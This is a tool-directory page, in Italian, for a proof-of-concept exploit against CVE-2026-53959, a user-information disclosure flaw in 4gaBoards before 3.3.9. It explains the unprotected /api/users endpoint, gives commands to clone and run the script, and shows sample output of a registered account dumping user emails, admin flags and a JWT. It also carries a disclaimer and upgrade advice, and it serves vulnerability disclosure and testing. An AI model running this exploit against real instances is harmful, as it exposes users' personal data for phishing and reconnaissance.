Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-53959 — 4gaBoards < 3.3.9 - Divulgazione di informazioni utente | Kitploit
Strumenti/GitHubGitHub/anirbala98/cve-2026-53959
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration TestingApprendimento e FormazioneSicurezza delle API
GitHubanirbala98/cve-2026-53959

CVE-2026-53959

4gaBoards < 3.3.9 - Divulgazione di informazioni utente

Vedi Repository
11 giorno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-53959 - 4gaBoards < 3.3.9 - Divulgazione di informazioni utente

Questa repository contiene un exploit Proof of Concept (PoC) per CVE-2026-53959

Dichiarazione di non responsabilità

Questo progetto è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati. Non utilizzarlo contro sistemi che non possiedi o per cui non hai il permesso di testare.

Panoramica

4gaBoards è un sistema di bacheche per la gestione di progetti in tempo reale. Prima della versione 3.3.9, 4gaBoards consente a qualsiasi utente autenticato di enumerare le informazioni dell'account di ogni utente tramite GET /api/users e di recuperare account arbitrari tramite GET /api/users/:id. Le azioni users/index e users/show si basano esclusivamente sulla policy predefinita is-authenticated in server/config/policies.js, e server/api/controllers/users/index.js restituisce il risultato di sails.helpers.users.getMany() senza autorizzazione specifica del richiedente o sanificazione della risposta. Le risposte espongono email, telefono, organizzazione, nome, isAdmin, ssoGoogleEmail, ssoGithubEmail e altri campi email collegati a SSO, inclusi i dati degli amministratori. Questo consente l'enumerazione degli utenti a livello di istanza, la perdita della privacy e attività di ricognizione mirata per phishing. Il problema è risolto nella versione 3.3.9.

Versioni interessate

ComponenteVersione
Vulnerabile<=3.3.8
Corretta3.3.9

Requisiti

  • Python 3.13.14
  • Requests 2.32.5

Installazione

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-53959.git
cd CVE-2026-53959/
pip install -r requirements.txt

Utilizzo

root@kitploit:~
python exploit.py <base_url>
python exploit.py http://localhost:3000

Esempio

root@kitploit:~
└─$ python exploit.py http://localhost:3000
[*] Creating a new user...
[+] Registration successful! 
[+] Retrieved Access Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IjRjOTE1NzNmLTY5YzktNGQ5OS04ZWUxLWQ1ODZjNzZkNzAyZiJ9.eyJpYXQiOjE3ODcxMjExNzUsInN1YiI6IjE4NDQ5MDI5OTc5OTQyNDMzNTAiLCJleHAiOjE4MTg2NTcxNzV9.OwNTyxE-JS0pztbX4sLz0uzu3GjeyETNFQVbGVxzXxA

[*] Dumping user information...

{"items":[{"id":"1844837973439284230","createdAt":"2026-08-19T04:23:44.000Z","updatedAt":null,"email":"[email protected]","isAdmin":true,"isVerified":false,"name":"Demo Demo","username":"demo","phone":null,"organization":null,"ssoGoogleEmail":null,"ssoGithubUsername":null,"ssoGithubEmail":null,"ssoMicrosoftEmail":null,"ssoOidcEmail":null,"lastLogin":"2026-08-19T06:29:23.463Z","lastEmailVerificationRequestAt":null,"deletedAt":null,"createdById":"1844837973439284230","updatedById":null,"deletedById":null,"isPasswordAuthenticated":true,"avatarUrl":null},{"id":"1844902997994243350","createdAt":"2026-08-19T06:32:55.000Z","updatedAt":null,"email":"[email protected]","isAdmin":false,"isVerified":false,"name":"test","username":null,"phone":null,"organization":null,"ssoGoogleEmail":null,"ssoGithubUsername":null,"ssoGithubEmail":null,"ssoMicrosoftEmail":null,"ssoOidcEmail":null,"lastLogin":null,"lastEmailVerificationRequestAt":null,"deletedAt":null,"createdById":"1844902997994243350","updatedById":null,"deletedById":null,"isPasswordAuthenticated":true,"avatarUrl":null}]}

Mitigazione

Aggiorna 4gaBoards alla versione 3.3.9 o successiva.

Riferimenti

  • https://www.tenable.com/cve/CVE-2026-53959
  • https://github.com/RARgames/4gaBoards/security/advisories/GHSA-p77f-p47g-h72p
Scarica lo strumento